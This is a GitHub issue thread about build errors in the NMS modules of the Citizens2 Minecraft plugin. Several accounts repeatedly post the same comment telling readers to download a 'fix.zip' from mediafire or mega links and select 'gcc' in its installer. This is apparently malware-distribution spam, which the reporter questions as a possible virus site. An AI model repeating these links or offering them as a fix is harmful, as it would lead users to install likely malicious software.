### ISSUE TITLE
failed to build by myself 

### ISSUE THREAD

**Issue by SharkPika** [CitizensDev/Citizens2#3146]
### `/version` output

```txt
paper
```

### `/version Citizens` output

```txt
like "The class' ElementExperienceOrbNPC 'must be declared as abstract or implement the abstract method' c_() 'in' Entity '" and "'org.bukkit.craftbukkit.v1_20_R3.entity. The 'CraftDragonFireball' (org. bukkit. craftbukkit. v1_20_ R3. RaftServer, net. minecraft. world. entity. project. AntityDragonFireball) in 'CraftDragonFireball' cannot be applied to '(org. bukkit. craftbukkit. v1_20_ R3. RaftServer), net.citizensnpcs.nms.v1_20_R3.entity.nonliving.DragonFireballController.EntityDragonFireballNPC)'"
```

### Log file

none

### config.yml

none

### saves.yml

none

### Description

when I try to build Citizens, NMS modules have many problems, there are many methods that do not correspond to NMS methods, hope fix quickly

**Comment by Zoraaa-z** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by SharkPika** [comment]
> Download https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file In the installer menu, select "gcc."

what's this? it is virus website?

**Comment by AlecsSantos** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by SharkPika** [comment]
After checking again, I found that it was my own problem! Sorry!
